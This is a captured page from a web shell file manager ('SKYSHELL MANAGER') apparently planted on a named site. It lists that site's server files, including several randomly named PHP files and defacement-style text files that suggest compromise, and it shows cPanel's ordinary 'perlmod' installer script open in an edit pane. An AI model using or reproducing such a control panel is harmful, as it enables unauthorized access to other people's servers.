📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: perlmod
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - whostmgr/bin/perlmod Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited #### DEPRCATED #### use Cwd; use File::Spec; use CPAN; if ( !-e '/usr/bin/ncftpget' && -e '/usr/local/bin/ncftpget' ) { system 'ln', '-s', '../local/bin/ncftpget', '/usr/bin/ncftpget'; } chomp( my $mod = <STDIN> ); system 'ln -s /usr /usr/local/ssl 2>/dev/null'; my $install = @ARGV && $ARGV[0] eq '-i' ? 1 : 0; if ( $install && -x '/usr/local/cpanel/scripts/perlinstaller' ) { exec '/usr/local/cpanel/scripts/perlinstaller', $mod; } my $homedir = ( getpwuid($>) )[7]; my $protoc = 'http'; # Attempt to use user's CPAN config if ( -e $homedir . '/.cpan/CPAN/MyConfig.pm' ) { eval { require $homedir . '/.cpan/CPAN/MyConfig.pm'; }; } if ( !-e $homedir . '/.cpan/CPAN/MyConfig.pm' || $@ ) { # No user CPAN config exists, using system eval { require CPAN::Config; }; } { no warnings 'redefine'; sub CPAN::Distribution::test { my ($self) = @_; $self->make; } } require CPAN::HandleConfig; my @missing_config_opts = CPAN::HandleConfig::missing_config_data(); if (@missing_config_opts) { # System CPAN config doesn't exist, reset $CPAN::Config = { 'build_cache' => q[10], 'build_dir' => q[/home/.cpan/build], 'cache_metadata' => q[1], 'cpan_home' => q[/home/.cpan], 'dontload_hash' => {}, 'ftp' => q[/usr/bin/ftp], 'ftp_proxy' => q[], 'getcwd' => q[cwd], 'gzip' => q[/bin/gzip], 'histfile' => q[/home/.cpan/histfile], 'histsize' => q[100], 'http_proxy' => q[], 'inactivity_timeout' => q[310], 'inhibit_startup_message' => q[1], 'index_expire' => q[1], 'keep_source_where' => q[/home/.cpan/sources], 'lynx' => q[], 'make' => q[/usr/bin/make], 'make_arg' => q[], 'make_test' => q[NO], 'make_install_arg' => q[UNINST=1], 'makepl_arg' => q[], 'mbuild_arg' => q[], 'mbuild_install_arg' => q[], 'mbuild_install_build_command' => q[./Build], 'mbuildpl_arg' => q[], 'ncftpget' => q[], 'no_proxy' => q[], 'pager' => q[/usr/bin/less], 'prefer_installer' => q[MB], 'prerequisites_policy' => q[follow], 'scan_cache' => q[atstart], 'shell' => q[/bin/bash], 'tar' => q[/bin/tar], 'term_is_latin' => q[1], 'unzip' => q[/usr/bin/unzip], 'urllist' => [qq[$protoc://ftp.cpanel.net/pub/CPAN/]], 'wait_list' => [q[wait://ls6.informatik.uni-dortmund.de:1404]], 'wget' => q[/usr/bin/wget], }; # Define missing options just in case my @missing_config_opts = CPAN::HandleConfig::missing_config_data(); foreach my $opt (@missing_config_opts) { $CPAN::Config->{$opt} = q[]; } } my @mods_to_get; push( @mods_to_get, $mod ); for my $module (@mods_to_get) { if ( @ARGV && $ARGV[0] eq '-i' ) { CPAN::Shell->install($module); } else { print qq{<br /><br /><b><font size="+3">Modules matching your query (click to install)</font></b>\n}; my $nummods = 0; for my $mod ( CPAN::Shell->expand( 'Module', "/$mod/" ) ) { $nummods++; my $modname = $mod->{'ID'}; print qq{<font size="+2"><a href="perlmod?action=install&modname=$modname">$modname</a></font>\n}; } if ( !$nummods ) { print qq{<font size="2"><b>No Modules Match</b></font>\n}; } } } print "perlmod--Install done\n";
Save